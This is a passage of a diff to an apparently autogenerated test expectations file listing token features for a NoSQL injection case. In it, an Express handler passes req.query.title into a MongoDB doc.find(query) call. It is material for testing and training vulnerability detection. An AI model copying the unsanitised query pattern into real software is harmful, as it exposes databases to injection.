autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:18 | req | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:18 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:18 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:24 | req.query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:24 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:24 | req.query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:24 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:24 | req.query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:30 | req.query.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:30 | req.query.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:30 | req.query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:30 | req.query.title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:30 | req.query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:30 | req.query.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:20:60:24 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:20:60:24 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:20:60:24 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:20:60:24 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:20:60:24 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:26:60:30 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:26:60:30 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:26:60:30 | title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:26:60:30 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:26:60:30 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:12 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:12 | MongoClient | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:12 | MongoClient | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:12 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:12 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:20 | MongoClient.connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:20 | MongoClient.connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:20 | MongoClient.connect | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:20 | MongoClient.connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:61:20 | MongoClient.connect | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | MongoCl ... y);\\n\\t}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | MongoCl ... y);\\n\\t}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | MongoCl ... y);\\n\\t}) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | MongoCl ... y);\\n\\t}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | MongoCl ... y);\\n\\t}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | exceptional return of MongoCl ... y);\\n\\t}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | exceptional return of MongoCl ... y);\\n\\t}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | exceptional return of MongoCl ... y);\\n\\t}) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | exceptional return of MongoCl ... y);\\n\\t}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:2:66:3 | exceptional return of MongoCl ... y);\\n\\t}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:14:61:20 | connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:14:61:20 | connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:14:61:20 | connect | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:14:61:20 | connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:14:61:20 | connect | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:22:61:53 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:22:61:53 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:22:61:53 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -1742,6 +9356,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:22:61:53 | 'mongod ... 7/test' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:22:61:53 | 'mongod ... 7/test' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:22:61:53 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:61:55 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:61:55 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:61:55 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:61:55 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:61:55 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | (err, c ... ry);\\n\\t} | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | (err, c ... ry);\\n\\t} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | (err, c ... ry);\\n\\t} | calleeImports | mongodb | @@ -1751,6 +9375,86 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | (err, c ... ry);\\n\\t} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | (err, c ... ry);\\n\\t} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | (err, c ... ry);\\n\\t} | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:56:66:2 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:57:61:59 | err | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:57:61:59 | err | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:57:61:59 | err | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:57:61:59 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:57:61:59 | err | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:61:62:61:67 | client | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:9 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:9 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:9 | doc | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:9 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:9 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc = c ... ('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc = c ... ('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc = c ... ('doc') | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc = c ... ('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:7:62:49 | doc = c ... ('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:18 | client | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:18 | client | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:18 | client | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:18 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:18 | client | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:21 | client.db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:21 | client.db | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:21 | client.db | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:21 | client.db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:21 | client.db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | client.db("MASTER") | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | client.db("MASTER") | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | client.db("MASTER") | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | client.db("MASTER") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | client.db("MASTER") | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | exceptional return of client.db("MASTER") | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | exceptional return of client.db("MASTER") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | exceptional return of client.db("MASTER") | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | exceptional return of client.db("MASTER") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:31 | exceptional return of client.db("MASTER") | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:42 | client. ... lection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:42 | client. ... lection | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:42 | client. ... lection | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:42 | client. ... lection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:42 | client. ... lection | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | client. ... ('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | client. ... ('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | client. ... ('doc') | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | client. ... ('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | client. ... ('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | exceptional return of client. ... ('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | exceptional return of client. ... ('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | exceptional return of client. ... ('doc') | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | exceptional return of client. ... ('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:13:62:49 | exceptional return of client. ... ('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:20:62:21 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:20:62:21 | db | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:20:62:21 | db | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:20:62:21 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:20:62:21 | db | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:23:62:30 | "MASTER" | CalleeFlexibleAccessPath | client.db | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:23:62:30 | "MASTER" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:23:62:30 | "MASTER" | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1759,6 +9463,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:23:62:30 | "MASTER" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:23:62:30 | "MASTER" | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:23:62:30 | "MASTER" | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:33:62:42 | collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:33:62:42 | collection | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:33:62:42 | collection | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:33:62:42 | collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:33:62:42 | collection | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:44:62:48 | 'doc' | CalleeFlexibleAccessPath | client.db().collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:44:62:48 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:44:62:48 | 'doc' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1766,6 +9475,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:44:62:48 | 'doc' | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:44:62:48 | 'doc' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:62:44:62:48 | 'doc' | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:5 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:5 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:5 | doc | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:5 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:5 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:10 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:10 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:10 | doc.find | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:10 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:10 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | doc.find(query) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | exceptional return of doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | exceptional return of doc.find(query) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:3:65:17 | exceptional return of doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:7:65:10 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:7:65:10 | find | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:7:65:10 | find | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:7:65:10 | find | enclosingFunctionName | 